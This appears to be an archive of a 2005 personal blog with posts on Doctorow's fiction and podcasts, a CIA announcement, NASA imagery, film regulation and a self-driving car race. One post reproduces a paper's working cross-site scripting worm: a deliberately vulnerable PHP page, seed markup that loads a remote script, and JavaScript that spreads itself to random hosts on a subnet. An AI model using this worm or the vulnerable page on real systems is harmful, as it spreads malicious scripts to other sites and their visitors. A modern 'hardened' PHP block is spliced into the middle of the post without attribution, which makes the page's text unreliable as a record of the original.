Saturday, October 15, 2005

[Doctorow] Down and Out podcast concludes

Mark Forman is the podcaster who's been serializing my novel Down and Out in the Magic Kingdom read aloud, one chapter at a time, with backing from great, Creative Commons-licensed music. Today he concluded the reading with chapters nine and ten in one installment. Now he's embarked upon his next project, reading Lessig's magnificent Free Culture.

Mark's podcast feed: http://legup.libsyn.com/rss
Final installment: http://legup.blogspot.com/2005/10/and-so-it-goesdao10chap910.html
Down and Out in the Magic Kingdom: http://craphound.com/down

-- Cory Doctorow doctorow@craphound.com

Friday, October 14, 2005

via cia.gov

DNI AND D/CIA ANNOUNCE ESTABLISHMENT OF THE NATIONAL CLANDESTINE SERVICE

The Director of National Intelligence, John D. Negroponte, and the Director of the Central Intelligence Agency, Porter J. Goss, today announced the creation of the National Clandestine Service (NCS) at CIA. The initiative will strengthen the direction and leadership of human intelligence throughout the Intelligence Community (IC). The plan reflects the thinking of some of the most seasoned veterans in human intelligence collection, men and women with decades of experience in the field.

Thursday, October 13, 2005

via Earth Observatory Newsroom

NASA Blue Marble Next Generation

In celebration of the deployment of its Earth Observing System, NASA is pleased to share the newest in its series of stunning Earth images, affectionately named the "Blue Marble." This new Earth imagery enhances the Blue Marble legacy by providing a detailed look at an entire year in the life of our planet. In sharing these Blue Marble images, NASA hopes the public will join with the agency in its continuing exploration of our world from the unique perspective of space.
posted by Gary Williams at 10:49 PM

via www.bindshell.net

The Cross-Site Scripting Virus

Abstract

This paper explores the new threat of cross-site scripting (XSS) viruses. To date, cross-site scripting has never been utilised to generate viruses. These viruses are a new species which are platform independent and not affected by common firewall configurations. XSS viruses could have a significant impact on Internet continuity, including distributed denial of service (DDOS) attacks, spam and dissemination of browser exploits. This is particularly relevant with the increasing sophistication of web browsers and the growing popularity of web-based applications such as Wikis and Blogs.

Update: Included in the paper is the following:

The following crafted, permanently XSS-exploitable PHP page can be infected with a virus. The page accepts a parameter (param) value and writes it to a file (file.txt). This file is then returned in the response to the browser, so the file contains the previous value of the "param" parameter. If no parameter is passed, the page displays the file without updating it.

Web Application: index.php

<?php
// Stored XSS: the parameter is written to disk verbatim ...
$p = $HTTP_GET_VARS['param'];
$filename = "./file.txt";
if ($p != "") {
    $handle = fopen($filename, "wb");
    fputs($handle, $p);
    fclose($handle);
}
// ... and echoed back to every later visitor without any encoding.
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
print $contents;
?>

This page (index.php) was hosted on multiple virtual servers within a 10.0.0.0/24 subnet. One web application instance was then seeded with the following code, which retrieves a javascript file and executes it. Alternatively, it is possible to inject the entire code into the vulnerable applications rather than requesting a javascript file. For simplicity, a javascript file (xssv.js) was requested.
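For contrast, here is a hardened counterpart of the index.php above. This is an added example, not code from the paper or from bindshell.net: it keeps the page's behaviour (store ?param= in file.txt, echo the file back) but closes the stored-XSS sink by HTML-encoding the stored data at output time, which is what makes the seeded iframe and script tags inert. The 4096-byte cap and the Content-Security-Policy value are assumptions chosen for this example, not anything the paper specifies.

```php
<?php
// Hardened counterpart of the paper's index.php. Added example, not the
// paper's code. Same behaviour (store ?param= in file.txt, echo the file
// back), but the stored data can no longer be interpreted as markup.
// The length cap and the CSP policy below are assumptions for this example.
declare(strict_types=1);

$filename = __DIR__ . '/file.txt';

// $_GET replaces $HTTP_GET_VARS, which no longer exists in modern PHP.
// Only accept a scalar string; ?param[]=x would otherwise arrive as an array.
$p = (isset($_GET['param']) && is_string($_GET['param'])) ? $_GET['param'] : '';

if ($p !== '') {
    // Assumed cap: bounds what any one request can persist in the shared file.
    if (strlen($p) > 4096) {
        http_response_code(400);
        exit('param too long');
    }
    // LOCK_EX prevents interleaved writes from concurrent requests.
    file_put_contents($filename, $p, LOCK_EX);
}

$contents = is_file($filename) ? (string) file_get_contents($filename) : '';

// Declare the charset so the browser cannot sniff a different encoding.
header('Content-Type: text/html; charset=UTF-8');

// Defence in depth: a policy that only allows scripts from this origin means
// a remote <script src="http://<webserver>/xssv.js"> would be refused even
// if output encoding were ever bypassed. Assumed policy; tune to the real site.
header("Content-Security-Policy: default-src 'self'");

// The actual fix for the paper's vulnerability: encode stored data at output
// time, so <iframe> and <script> markup from an earlier request is rendered
// as literal text rather than parsed by the browser.
echo '<pre>' . htmlspecialchars($contents, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</pre>';
```

Hosting this version in place of the original and repeating the paper's seed request shows the difference directly: the response contains the seed markup as visible text, no iframe is created, no remote script is fetched, and the infection chain stops at the first hop. ENT_HTML5 requires PHP 5.4 or later; on older builds drop that flag and keep ENT_QUOTES.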
Injected Seed Code:

<iframe name="iframex" id="iframex" src="hidden" style="display:none"></iframe>
<script SRC="http://<webserver>/xssv.js"></script>

The javascript file that was requested in the example is shown below. Its self-propagation uses an iframe which is periodically reloaded using the loadIframe() function. The target site IP address of the iframe is selected randomly within the 10.0.0.0/24 subnet via the function get_random_ip(). The XSS virus uses a combination of these two functions and the continual periodic invocation using the setInterval() function.

Javascript: xssv.js

// Point the named hidden iframe at a new URL; returns false once it is loaded.
function loadIframe(iframeName, url) {
    if (window.frames[iframeName]) {
        window.frames[iframeName].location = url;
        return false;
    } else {
        return true;
    }
}

// Build the same seed payload and submit it to a random host's index.php.
function do_request() {
    var ip = get_random_ip();
    var exploit_string = '<iframe name="iframe2" id="iframe2" src="hidden" style="display:none"></iframe> <script SRC="http://<webserver>/xssv.js"></script>';
    loadIframe('iframe2', "http://" + ip + "/index.php?param=" + exploit_string);
}

function get_random() {
    var ranNum = Math.round(Math.random() * 255);
    return ranNum;
}

// Random host within the lab's 10.0.0.0/24 subnet.
function get_random_ip() {
    return "10.0.0." + get_random();
}

// Repeat every 10 seconds for as long as the page stays open.
setInterval("do_request()", 10000);

Viewing the seeded web application caused the browser to infect other web applications within the 10.0.0.0/24 subnet. This infection continued until some, but not all, applications were infected. At this point the browser was manually stopped. Another browser was then used to view one of the newly infected web applications. The virus then continued to infect the remaining uninfected web applications within the subnet. This proof of concept shows that under controlled conditions, not dissimilar to a real-world environment, an XSS virus can be self-propagating and infectious.

posted by Gary Williams at 1:57 PM

Wednesday, October 12, 2005

via Yahoo!
News

Buried clause could tag films, TV shows as porn

By Brooks Boliek
Wed Oct 12, 3:18 AM ET

WASHINGTON (Hollywood Reporter) - Tucked deep inside a massive bill designed to track sex offenders and prevent children from being victimized by sex crimes is language that could put many Hollywood movies in the same category as hard-core, X-rated films.

The provision added to the Children's Safety Act of 2005 would require any film, TV show or digital image that contains a sex scene to come under the same government filing requirements that adult films must meet.

Currently, any filmed sexual activity requires an affidavit that lists the names and ages of the actors who engage in the act. The film is required to have a video label that claims compliance with the law and lists where the custodian of the records can be found. The record-keeping requirement is known as Section 2257, for its citation in federal law. Violators could spend five years in jail.

Under the provision inserted into the Children's Safety Act, the definition of sexual activity is expanded to include simulated sex acts like those that appear in many movies and TV shows.

'It's a significant and unprecedented expansion of the scope of the law,' one industry executive said. 'I don't think the studios would like being grouped in with the hard-core porn industry.'

The provision, written by Rep. Mike Pence, R-Ind., could have ramifications beyond simply requiring someone to ensure that the names and ages of actors who partake in pretend lovemaking are recorded, as compliance with Section 2257 in effect defines a movie or TV show as a pornographic work under federal law.

Industry sources say the provision was included in the bill at the behest of the Justice Department. Calls to Pence's office and the Justice Department went unreturned Tuesday.
posted by Gary Williams at 8:12 PM

via Warrenellis.com

Join The Podcast

IF you're making music yourself, and you'd like me to listen to your stuff towards including it in a podcast, email an mp3 to warrenellis@gmail.com

Obviously, I won't be able to include everything I receive in whatever podcast I finally make. But, frankly, podcasting has been so fucking boring of late that I feel like putting another music show out there. So any and all contributions to a podcast of unsigned and/or independent musicians would be gratefully received...

posted by Gary Williams at 10:14 AM

Sig On The Spam

Today I got a piece of spam with this really clever sig:

----
The soul would have no rainbow had the eyes no tears.
A teacher affects eternity; he can never tell where his influence stops.
My favorite thing is to go where I've never been.
A critic is a legless man who teaches running.
Conscience is a mother-in-law whose visit never ends.
RECONSIDER, v. To seek a justification for a decision already made.
Who begins too much accomplishes little.
A dreamer lives for eternity.
There is nothing stronger in the world than gentleness.
Who escapes duty, avoids a gain.
You can't have everything. Where would you put it?
Fear not those who argue but those who dodge.
Chance fights ever on the side of the prudent.
If all else fails, immortality can always be assured by spectacular error.
Of all noises, I think music is the least disagreeable.

posted by Gary Williams at 10:01 AM

Monday, October 10, 2005

Using Flickr For Photo Stores On Net

My homepage space (garywilliams.org) got full recently, so I deleted 19 meg of mp3s (my Chuck recordings) for photo space to use here on TFS, since I'm using free space from blogspot (I don't have disk space for images on blogspot).

But the other night it occurred to me that Claude uses flickr for her images on her blog, so today I learned how to use flickr images (you click on the "all sizes" button above a picture and it shows you the flickr address of the image as well as the original size image). Or you can right click and pick "View Picture" and it goes to the pure image and shows you the URL. So I downloaded the Flickr uploader and put this image from Gif Construction Set up as an example.

Update: Today's Penny Arcade had a link to a band's site that included a link to this free disk space site. So I've moved the Beginning Chuck examples' mp3s. You can check the links there, or see the new link page: http://www.putfile.com/gwms451

[Doctorow] Themepunks five is live!

Part five of Themepunks, my novel-in-progress, is up on Salon this morning. Themepunks is the story of a tech-boom driven by commodity hardware, three-d printers, and leftover geek talent going begging after the dotcom bust. Part five tells the story of Lester and Perry's next invention, and of Andrea's miserable homecoming to Northern California:

> "Resource contention readily decomposes into a bunch of smaller problems, with distinctive solutions. Take dishes: every dishwasher should be designed with a 'clean' and a 'dirty' compartment -- basically, two logical dishwashers. You take clean dishes out of the clean side, use them, and put them into the dirty side. When the dirty side is full, the clean side is empty, so you cycle the dishwasher and the clean side becomes dirty and vice-versa. I had some sketches for designs that would make this happen, but it didn't feel right: making dishwashers is too industrial for us. I either like making big chunks of art or little silver things you can carry in your pocket."
>
> She smiled despite herself. She was drawing a half-million readers a day by doing near-to-nothing besides repeating the mind-blowing conversations around her. It had taken her a month to consider putting ads on the site -- lots of feelers from blog "micro-labels" who'd wanted to get her under management and into their banner networks, and she broke down when one of them showed her a little spreadsheet detailing the kind of long green she could expect to bring in from a couple of little banners, with her getting the right to personally approve every advertiser in the network. The first month, she'd made more money than all but the most senior writers on the Merc. The next month, she'd outstripped her own old salary. She supposed it meant that she should make it official and phone in a resignation to Jimmy, but they'd left it pretty ambiguous as to whether she was retiring or taking a leave of absence and she was reluctant to collapse that waveform into the certainty of saying goodbye to her old life.
>
> "So I got to thinking about snitch-tags, radio frequency ID gizmos. Remember those? When we started talking about them a decade ago, all the privacy people went crazy, totally sure that these things would be bad news. The geeks dismissed them as not understanding the technology. Supposedly, an RFID can only be read from a couple inches away -- if someone wanted to find out what RFIDs you had on your person, they'd have to wand you, and you'd know about it."
>
> "Yeah, that was bull," Perry said. "I mean, sure you can't read an RFID unless it's been excited with electromagnetic radiation, and sure you can't do that from a hundred yards without frying everything between you and the target. But if you had a subway turnstile with an exciter built into it, you could snipe all the tag numbers from a distant roof with a directional antenna. If those things had caught on, there'd be exciters everywhere and you'd be able to track anyone you wanted -- christ, they even put RFIDs in the hundred-dollar bill for a while! Pickpockets could have figured out whose purse was worth snatching from half a mile away!"

Part five: http://www.salon.com/tech/feature/2005/10/10/themepunks_5/index.html
Earlier installments: http://dir.salon.com/topics/cory_doctorow/

-- Cory Doctorow doctorow@craphound.com

Sunday, October 09, 2005

In a Grueling Desert Race, a Winner, but Not a Driver

By JOHN MARKOFF
Published: October 9, 2005

The race, called the Grand Challenge, was a Pentagon project meant to promote the development of technologies for 21st-century automated warfare. The car was not immediately declared the winner because officials were doing final calculations, but race times on the event's Web site indicated that it had come in several minutes ahead of two entries from Carnegie Mellon University.

The Stanford scientists who led the 18-month effort to build Stanley said they saw their victory as a significant leap forward in the field of artificial intelligence, a discipline that has long suffered from big promises that did not pan out.

'This is for people who say, 'Cars can't drive themselves,' ' said Sebastian Thrun, the director of the Stanford Artificial Intelligence Laboratory and co-leader of the Stanford team. 'These are the same people who said the Wright brothers wouldn't fly.'

posted by Gary Williams at 1:31 PM